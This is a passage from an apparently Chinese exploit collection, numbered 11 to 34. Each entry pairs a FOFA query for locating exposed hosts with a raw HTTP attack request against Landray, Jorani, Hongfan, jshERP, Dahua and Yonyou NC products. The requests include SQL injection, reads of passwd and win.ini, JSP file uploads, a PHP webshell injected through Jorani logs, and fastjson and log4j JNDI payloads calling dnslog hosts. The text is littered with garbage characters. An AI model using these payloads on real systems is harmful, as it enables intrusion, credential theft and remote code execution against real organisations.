------WebKitFormBoundaryxdgaqmqu--, B0 y/ q+ u" i8 x' [
# H+ q3 `/ L. G* V
7 c8 A% z. O1 X' o( A0 G
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入$ `' n8 ]/ C  c( h
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"( v7 J1 T% \0 j$ B5 v: f& V; D3 ]3 o* f
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
4 G% C$ b( ?3 mHost: 127.0.0.1$ X* U  E1 U) o( L9 i' o3 g
Pragma: no-cache
3 ~6 g: d$ L5 c" l# U. u' @0 m) `Cache-Control: no-cache
4 _5 J( \4 d3 i( n7 e7 \5 m/ ^# E8 qUpgrade-Insecure-Requests: 18 A7 n, M0 [, u9 s  c' u- M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 G) k% S3 a# S' U, c5 B0 V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* ]6 {# Y2 f. d0 z
Accept-Encoding: gzip, deflate
/ m$ e$ t& h8 j+ T# M' tAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
" Y8 R$ k* F$ X+ B$ e6 FConnection: close5 |  V4 y  d. S6 N

/ T! O0 a7 d9 S* g
9 t2 Q% p' G+ B. T, {/ d12. Jorani < 1.0.2 远程命令执行. u0 y+ ~. b6 o: y8 T4 N6 Q
FOFA:title="Jorani"
7 `& P- S' h$ J! p5 ~第一步先拿到cookie" p" d4 I. I- j/ C+ {- d% U
GET /session/login HTTP/1.1* `3 T# K+ b  Q* k7 w* F
Host: 192.168.190.302 E& A0 i1 `: t- q% A* \
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
* X8 N  i! K- C  i% c3 {' _Connection: close7 Y( y) C. G* g, \0 a- S# x3 Q
Accept-Encoding: gzip
( K* c  m$ s/ U) E) ~  j/ C
& I% O( p( S& o6 z
* [3 t' A7 h8 o4 S# r- V& i响应中csrf_cookie_jorani用于后续请求8 X8 P7 p5 Q( l% j+ |
HTTP/1.1 200 OK
, t$ F" k/ I9 A* |" d* vConnection: close
) @4 y& _# R% \8 Y: bCache-Control: no-store, no-cache, must-revalidate, ^6 _! y/ m! E# \' C
Content-Type: text/html; charset=UTF-8# \& T5 ?. C; `  {, V1 Q
Date: Tue, 24 Oct 2023 09:34:28 GMT4 j; b. P: E$ {7 D: C8 Z. M
Expires: Thu, 19 Nov 1981 08:52:00 GMT
% i. P' \. v, A" k  |- pLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
' k& T4 F) W, D) Q& WPragma: no-cache
6 P+ s  i7 F9 R+ nServer: Apache/2.4.54 (Debian)% D6 I# n6 H- o
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/. V" Q7 k  ^' a; _8 J
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
( j! P! W& E8 O7 F0 l6 ~Vary: Accept-Encoding
5 b  `; F. V' G/ G, f4 t. Z- N
# F- g  X7 U- b, V
: v5 M9 R* a' I) X/ T( u% VPOST请求,执行函数并进行base64编码
( f* `! j% h0 ?% [: L2 zPOST /session/login HTTP/1.1
3 p( u4 h/ ^" A% n0 t$ KHost: 192.168.190.30+ Y2 E8 w0 |  q" d" k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36: m% f: d" U! G, m0 r$ V; {; @
Connection: close2 ^  P4 y( N+ V8 K$ _
Content-Length: 252
2 t5 ?# I: e8 z; h" j3 MContent-Type: application/x-www-form-urlencoded) t. e* }# E7 F( m# O1 G
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
6 B3 X7 ^" ~# YAccept-Encoding: gzip
" W) i$ w0 z6 k8 }4 j0 l0 E1 D! r  R7 v& T
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
. i. z9 n: \$ ]/ V: G% T' Q# @" i) s5 v, k
3 _; u8 `1 y) v% f- F

7 @' f" @5 T$ e2 _! o, S向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串+ `% W2 `& z  t- F( u
GET /pages/view/log-2023-10-24 HTTP/1.1! V# ?" _6 X4 K5 K$ T7 x
Host: 192.168.190.30( |4 I+ x7 F1 M6 D$ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36  r* P% l: J/ r; y
Connection: close
! r" g/ i/ k% YCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r  I! O0 \' n4 ?7 R2 R) H
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
/ G/ R0 ~7 U! iX-REQUESTED-WITH: XMLHttpRequest% o. b( c" Y' m9 S0 h3 _3 i
Accept-Encoding: gzip
+ Q1 r  o4 G$ }7 N! D2 |6 @! H% O& g0 T3 }3 G
8 n: L$ i+ E  M- i) @
13. 红帆iOffice ioFileDown任意文件读取# T# B& _4 u3 X6 c( ?
FOFA:app="红帆-ioffice"
  Z2 f" _. `% {4 H# \! g6 S* \GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
9 E3 ?0 B. z4 @Host: x.x.x.x( e3 l3 O/ ^; t% ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' }3 i( Z1 [( D0 p1 m- H4 JConnection: close$ K8 Z, j. t% w# ?
Accept: */*
2 N* Q$ }! n' @% jAccept-Encoding: gzip
. e/ C% I& n3 Y) w7 }; Z
& O+ X% i) i! a) J
/ C5 ~: J: }- j14. 华夏ERP(jshERP)敏感信息泄露3 y0 b1 x5 d5 ^
FOFA:body="jshERP-boot"! L0 f9 Q/ o" P! {
泄露内容包括用户名密码
" m- a$ W$ H0 }  g: \* G: J' MGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
1 \2 j/ s8 U' h5 u3 C, Y+ o( DHost: x.x.x.x4 g0 o/ W) G% p9 Q! L* U( k  y! d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
7 G% e2 p$ t+ D; H( tConnection: close3 J1 R; C, h8 X- C' l
Accept: */*
: H1 w6 r  d8 j( JAccept-Language: en; h* ^" x4 Q  f
Accept-Encoding: gzip/ Q) Y( x3 K" T' w0 Q% g7 T
4 C, L" a: @/ m$ L
( X7 R" k- Z: e7 K2 z+ F
15. 华夏ERP getAllList信息泄露
; A9 O9 [, {" b' j6 lCVE-2024-0490
, V; h# w3 X* Q  n+ JFOFA:body="jshERP-boot"" D  n1 \+ u2 W" O, E
泄露内容包括用户名密码% @8 X' {- f6 I) a$ `  I
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
' i' A5 G+ r4 l8 u( NHost: 192.168.40.130:100
# V4 v0 K0 R" G' H4 d  _/ cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
7 A- C) D1 v; w1 NConnection: close
" v! l& @+ m6 M+ P1 u, J2 w& yAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8# C- n! r3 Q+ {
Accept-Language: en
6 g, K3 M3 a- k. C- v8 c. e  asec-ch-ua-platform: Windows
# @  j8 r2 F. d$ e; V! b9 YAccept-Encoding: gzip, v1 u) m+ B. Q
- b+ _, O! V( b" P' B! i

; a3 W9 x* L8 r3 |- N& d. c( C16.  红帆HFOffice医微云SQL注入
9 Q( W6 s; m0 ~4 q+ `FOFA:title="HFOffice"
; Q6 u# N$ H- i2 ^* @& F: u& Apoc中调用函数计算1234的md5值7 e; v/ c+ n5 N. q+ ]
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
9 \, f& U; R2 L% Z, c8 gHost: x.x.x.x
/ v+ ]; Q9 N+ ]8 E/ f- G% }) ]User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
8 D. p) E6 B  ~1 ?5 f  cConnection: close
9 d; V' t# `" Z( T# \Accept: */*
% f& N( p$ W  G5 K' u8 NAccept-Language: en
, K6 m6 ^* V- \  M8 F- ~Accept-Encoding: gzip0 h/ w: A" e2 o
. c5 k5 A! m& C/ d

3 u/ q) s& _- v, p  k- h2 D5 h5 I' @17. 大华 DSS itcBulletin SQL 注入
/ s* E7 Q" g" fFOFA:app="dahua-DSS"
  ^' e4 f7 X$ PPOST /portal/services/itcBulletin?wsdl HTTP/1.1
* d6 J9 i0 [) |* @3 S: QHost: x.x.x.x' i0 j, m" J' s# E. E. r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 n8 ^- l5 b4 o; b' ]
Connection: close
) d( `% ^2 G- `6 U* tContent-Length: 3455 ^, Q/ E" I, ?6 x- ?+ k$ E
Accept-Encoding: gzip& t% V5 B1 Q! ~7 p" }
" G& P0 R6 D8 E1 ^
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
) {8 R1 o) P& G5 w; v1 k<s11:Body>" H/ f% j- B* V; B" q* x, K0 x% r+ k
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>5 `' a2 H% _/ ]% f
      <netMarkings>) [% ]- l3 V4 w4 Q/ v6 x7 e
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1' j$ F2 H# d! C; A8 t2 W4 Y- F0 W
      </netMarkings>0 o1 y/ J/ t; N* a
    </ns1:deleteBulletin>& ?% a; `7 P+ ]" X5 u; a% U- N
  </s11:Body>0 d) z2 _; K: T5 }& X9 n8 n. w& q& u
</s11:Envelope>
( }2 x& D6 S( N( R
2 S, g' l; w- c, F# q1 A% P; s/ p; |/ b
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
' o+ d/ Z9 l( E* i) T8 Y6 GFOFA:app="dahua-DSS"+ [% q; W/ B! H, Y% P+ }
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
2 X. b8 I& ~9 {7 pHost: your-ip) L& [" d3 j, v  q6 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 ^3 V7 o$ }# l5 I4 W; w
Accept-Encoding: gzip, deflate8 m7 h# M; Z5 c7 g+ q( ?4 I2 x
Accept: */*
; |) ~+ S; Z) S7 |) u0 j1 }Connection: keep-alive
3 e  I( V" R7 u9 L. e; \, G! |; C. @: @2 b( l

9 c' ~9 b8 i# _- x5 Q# E9 l* w
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入  `6 a9 [8 K6 ^4 {2 E4 T  D
FOFA:app="dahua-DSS"
4 s  G3 B* \5 ~8 d( w8 OGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
6 h( V$ u) N! V2 N/ l0 H8 mHost:0 }, ?% j! ?6 I/ h  ~. S! O! l
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
2 b; l: P4 s  yAccept-Encoding: gzip, deflate
0 w  x' l; p" B+ i4 G# T, aAccept: */*1 L0 O1 ]; K* ]- o! h7 W
Connection: keep-alive
9 B1 |0 v  ^" x4 }  m' a. ?0 [/ ~. V% ~

) G0 ]' P$ v5 w# O, \# m! W' d20. 大华ICC智能物联综合管理平台任意文件读取- O" g* a0 U/ L, O
FOFA:body="*客户端会小于800*"
+ `& o6 N& z8 i* W) L8 A; b% S  TGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
( R, h- Y+ S) B9 L9 U# L* PHost: x.x.x.x
. _7 g; c* |; w7 b9 L/ OUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ F* f4 }. l3 k( @% T( WConnection: close# B( s3 p  A$ m9 G  l) h1 l
Accept: */*
* m$ k/ G  O! C; }6 A! w5 H9 K9 mAccept-Language: en/ _+ \4 d4 ^) |; g, j1 |
Accept-Encoding: gzip
* K1 t0 {8 K, a; b
% d7 p% S& ^3 |; {9 R+ O. Z
# |" L8 ~. c+ f8 V0 g1 A21. 大华ICC智能物联综合管理平台random远程代码执行$ F3 K1 Z7 I! }
FOFA:icon_hash="-1935899595"
/ l1 a4 e  F; O# w. {: K( k0 J% HPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1& b4 [: v3 J* ]
Host: x.x.x.x, Z! F, p! E8 G. p/ X9 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- a  |- _5 |2 j/ C1 G; ]Content-Length: 1611 p+ `* \, ?8 w0 s
Accept-Encoding: gzip
  ~; d( r+ d- ~2 h# s( IConnection: close
" d; J7 c- a) {$ y7 N* L5 UContent-Type: application/json;charset=utf-8
4 b: [0 M1 H4 @5 |7 n  z  m
, |; z0 }& v0 B$ }+ b2 ^) y9 d5 k{4 D$ w/ _$ }7 K1 I, B, i( S; G0 c
"a":{
5 F  J7 n$ i7 v& n( q0 A" e/ z* ^4 M* @   "@type":"com.alibaba.fastjson.JSONObject",/ |% L" e1 Q  I- F( L. d7 c( p. D
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}( H% U' w7 _' ~* `
  }""
" Y( {% K( I  _% Z5 O1 D8 t, G}
% A3 b4 {8 _% ?0 y0 _
  w% W( P  r; i. f2 _
% f3 G/ b9 [* C% E0 i/ J0 j+ Q22. 大华ICC智能物联综合管理平台 log4j远程代码执行
2 N: E+ A- z- y5 `7 pFOFA:icon_hash="-1935899595"
: ~( {# l0 U* l. h' QPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
( M2 n! h: K' f  GHost: your-ip4 N( y+ v3 y) Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 Y4 Q' t' s! V4 K' E# i. UContent-Type: application/json;charset=utf-8
& R2 B; c9 r7 N# A* i4 T' H
5 a  ]8 s- i' k( ?{
+ F6 Y" R: s! a7 P$ |"loginName":"${jndi:ldap://dnslog}"
# K* T) I* B6 H( S% F7 L% i$ J}! x* T8 e: ?* R8 {8 a
8 W$ K2 D! y5 r, o
9 T) |* i1 B3 I2 j  l# s% H

, h( o5 S9 h- U; h4 h5 j0 H; a23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
6 b2 L# @/ V; A- K( \' mFOFA:icon_hash="-1935899595"
! i6 u/ `9 O  l7 c: EPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1  G* V% A* D  n# R9 b1 ?2 Q
Host: your-ip
" ~8 t# m0 R5 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 e$ e8 F" F" vContent-Type: application/json;charset=utf-84 Q. G3 w+ @! c$ V+ H3 s
Accept-Encoding: gzip0 a( t. P; ]* c3 K; S
Connection: close: T* [9 |" L: \- r' h; G

8 ]3 h0 _4 o& X9 t) ?4 U{
& [) ^- E6 \0 l9 P$ u- F, A    "a":{2 T: x& a+ ~5 g( W' E8 N
        "@type":"com.alibaba.fastjson.JSONObject",+ P) s$ p$ ?8 v" ~  @0 m6 k
       {"@type":"java.net.URL","val":"http://DNSLOG"}
8 o7 e2 D0 G) d        }""
; L$ s$ o) x5 z  K6 T- D' i2 y8 J}
' ~: d  Y; F1 N6 C) a6 M  m; T
  d% H7 y. ~( F" \0 r3 P/ a! }4 n. ~0 m/ l
24. 用友NC 6.5 accept.jsp任意文件上传
  ?1 |) N; U5 M+ Q4 |5 u* h5 }FOFA:icon_hash="1085941792"/ B; m7 H* L" a; P) |5 T
POST /aim/equipmap/accept.jsp HTTP/1.1
5 |& M3 }. U( [" L4 B; ~Host: x.x.x.x
/ y4 t4 q5 I6 n5 |User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36& G$ Y! o. Q/ ?6 D
Connection: close7 {- |9 W+ g+ e8 l
Content-Length: 4492 N! y5 p/ [2 p0 P5 x* G0 z% y
Accept: */*/ e1 Z, O! l6 d: E/ A! s* b6 ?
Accept-Encoding: gzip
$ N+ f7 T2 _% V! Y2 TContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc  }% \/ x+ {1 ^; o3 \; K
) ?, x9 `* q$ u6 C0 M' v$ F/ x- C
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc  _0 G5 c' e9 m8 P- x0 k- D
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
8 x( [0 [! P! O  d5 N2 f# \- cContent-Type: text/plain
& Q% ?: [) }; e0 Z& d* J  @& c2 U) X9 |
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>. x/ {, ~2 R9 J
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
6 h( Q9 s0 ], s1 ~8 MContent-Disposition: form-data; name="fname"3 Q. K9 E' M+ K! H6 A
% ?+ g* I  l# l
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp4 e2 c, _/ e$ D6 n# {" R4 B( [
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
2 ^6 c4 s# a8 g( Z+ |2 L5 z$ w- P5 R. j6 _& D  a8 p$ l5 F( F

! e9 _# a: c. e" c/ f: z25. 用友NC registerServlet JNDI 远程代码执行4 T+ `/ k, e; d4 x) i
FOFA:app="用友-UFIDA-NC"
4 J, g! F! c# e3 WPOST /portal/registerServlet HTTP/1.1
6 [3 s, ]6 T3 |# @( U: H; Z  jHost: your-ip
( t& u1 `; L& q8 b  UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
5 E7 _$ _9 h$ Y# @2 a+ VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9% {. U: l; \+ ?
Accept-Encoding: gzip, deflate( g: Z  ~8 ~8 L& V, p
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
2 X9 H- p, T9 k- c# O9 H: G9 WContent-Type: application/x-www-form-urlencoded: m% v3 P% P: y7 O7 P
+ j; \2 n' N0 ^, \
type=1&dsname=ldap://dnslog1 c. ?) v3 J. R  }' ^

$ r& H; U7 i* E6 K# d0 c5 x' Q" Y
& [- c. O# b, J# s9 V: v! O: p
6 M$ p& ^( G3 x3 y26. 用友NC linkVoucher SQL注入
9 Z: C9 [9 s0 D- f( Z1 H) TFOFA:app="用友-UFIDA-NC"' P. d' z' ~" r: ^. d7 U9 g# O
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
: o5 [) m; O5 a3 W' fHost: your-ip
* ?* k3 y/ E+ G9 ~8 A0 _) @: iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 S5 _1 }( S* D& h" l7 {
Content-Type: application/x-www-form-urlencoded/ b8 Q& A6 L3 h8 a6 A( u- S( s- o
Accept-Encoding: gzip, deflate3 `. J& |3 ~+ v+ B
Accept: */*! R2 J& G* x. x5 n) @! \5 M1 g
Connection: keep-alive' I: U* a+ M/ Z- K7 Q  F
' F+ G7 `  x$ h& p. F1 A  Q
. ^& d5 z' x8 a
27. 用友 NC showcontent SQL注入8 c3 S$ A( Q" h. J
FOFA:icon_hash="1085941792"* V+ J" d6 p: E- z2 l$ V( G
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
6 f7 y& R. M! f' qHost: your-ip
# {  I! W9 j3 i! v4 ]$ _$ E: e) {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 `# g; ^; M. I1 k5 L6 w# {
Accept-Encoding: identity
0 I; u  a8 g! |; h- QConnection: close
+ f  Z$ x+ ^3 ~# KContent-Type: text/xml; charset=utf-8% o8 w: R6 o1 o1 w3 N" O

5 b6 j( }- ]% T" }6 Y
( k" O8 `3 n) O4 s28. 用友NC grouptemplet 任意文件上传
: k% T6 y; Q( A1 FFOFA:icon_hash="1085941792"
( j4 c. X! {4 j6 ?POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1) T! p4 y+ y% x# b* y3 @6 D
Host: x.x.x.x
7 p" L' R0 {) `, P1 {. j* qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
3 c. {7 X8 B* @( ^; T& NConnection: close  J+ B( p; A( k: J# p: K
Content-Length: 2685 \5 k* u8 P! Y& w' w6 i  ^* V+ F
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk/ E. t$ r1 @9 H: l  ^8 s
Accept-Encoding: gzip8 K7 X1 F8 P  R9 V- Q1 U

: @$ e7 _' G. t0 H+ E3 B/ a  @------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk. @6 j' H9 V- M( k/ r( t% F
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"# l5 r4 K0 s# B3 l: s" B
Content-Type: application/octet-stream* B8 n6 m8 {7 z/ |2 _+ q  G

% v& ]6 `( D& C: _9 N3 \" ?9 C<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
/ c% h2 o9 P- u( g; R( ~( B( w( s------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--, ^  \. k2 r& B7 {* B
/ [! X7 r3 b1 e
% H& z2 L8 C! C. {- w2 J: E' {
/uapim/static/pages/nc/head.jsp6 C' A4 R' y& Q$ Y
7 |% M/ |5 ^: f( O9 V
29. 用友NC down/bill SQL注入/ g, k  |7 P; A, |& B  n' I
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"* r: _" F# J- H( d
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.18 F4 Z! V4 c( j- b
Host: your-ip
6 j2 c1 W8 u3 y! ^7 q: }! N. k; QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; {4 j6 P# ?, E9 i, G
Content-Type: application/x-www-form-urlencoded% G& p2 y1 j. Z
Accept-Encoding: gzip, deflate6 L6 C6 {. P  F+ n* E6 e' r
Accept: */*( @; I7 b) [3 R6 a4 a
Connection: keep-alive
9 a9 x' R1 P; k& ?4 I  G; @. |; }* L3 }8 U; {0 o/ [

: @% ^2 Q$ b+ D! Z30. 用友NC importPml SQL注入
8 G5 m0 W6 ]3 {2 d( L+ SFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"" h# y1 P8 M/ ~; u
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.15 I: \' f. k2 y, c5 n- ]
Host: your-ip# N: {  ]- w6 d8 X( h  O( W
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
1 L+ Q8 }2 ?6 J; [+ g- oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, f$ _% h$ q( E' w+ e  Q- N9 ~
Connection: close5 i7 g  y, f' z4 d; t, ~

! j* M5 c+ s) P------WebKitFormBoundaryH970hbttBhoCyj9V
- C( q, z7 ]8 ?+ d% D9 M: ?Content-Disposition: form-data; name="Filedata"; filename="1.jpg"' }" ]6 z7 }) F6 N& _/ k/ ^5 H) A; i. B
Content-Type: image/jpeg
) f" J- o! R9 R' g3 F------WebKitFormBoundaryH970hbttBhoCyj9V--5 n' d$ \0 Z( S4 Z! o

/ q# I+ J5 y4 Z  v1 T
5 q, O0 P% T# b6 F& H* Z: {" w8 \31. 用友NC runStateServlet SQL注入7 Y- Z1 a* m1 V* I- v1 S- G
version<=6.5: S! x4 v3 n; T6 M$ m* h- R
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
+ M- D( r; X" u; k* p. }GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1) W# X8 N. U7 X; a& d
Host: host
  P0 I. d; A3 ?: x2 O) CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.366 R2 l9 c1 g( Z" O
Content-Type: application/x-www-form-urlencoded
  m/ s" R% K( |. _2 I' @1 L4 o- ]3 n! k$ x

; V3 _* j3 P6 M32. 用友NC complainbilldetail SQL注入! Q4 L' {( [+ Y8 z4 X0 d
version= NC633、NC659 C4 u. O1 m% P. [
FOFA:app="用友-UFIDA-NC"2 h& V) v' W! k* Y' c7 q+ M
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
3 [8 T8 ^& E7 P: i2 ^7 v' DHost: your-ip
* ^) O) O) O+ B' mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ m6 F8 Y+ z" T8 X& Z. G1 T8 _* W
Content-Type: application/x-www-form-urlencoded
+ o1 H* v% @- K( Z# @Accept-Encoding: gzip, deflate+ |4 O2 [5 M2 r7 Y% M- u
Accept: */*
) w: p) Z" }6 k6 _" Z! P: CConnection: keep-alive9 D( m( ]1 R2 b  _: ?

( J$ U- U: a! [9 r+ F- D2 d* Z2 J- p, G* B6 b* o+ u
33. 用友NC downTax/download SQL注入
' a$ m$ K0 V( z/ A& g1 xversion:NC6.5FOFA:app="用友-UFIDA-NC"+ q* R$ V2 Y' p9 [- C6 m
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1" t# e. G! {9 e% I% B
Host: your-ip
; B. Z: d, Z3 y: u$ m* [7 v/ XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 u8 Z1 S! R. |& D2 M
Content-Type: application/x-www-form-urlencoded
4 u4 Q/ |/ A% K5 a3 c' j" YAccept-Encoding: gzip, deflate/ p$ e6 f9 Z) X, e2 N# [
Accept: */*
: @9 V" A) r& M! G5 F6 Q; a0 SConnection: keep-alive
* u! P; M, B; J  c6 N
! p3 P2 U! H2 P$ b4 h7 Y% N+ H6 s! }
34. 用友NC warningDetailInfo接口SQL注入
- G1 r, B8 O6 |2 Q, MFOFA:app="用友-UFIDA-NC"+ s6 Z4 C' B( D
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
* u5 D& a0 J1 J- c5 b. ]+ j+ lHost: your-ip
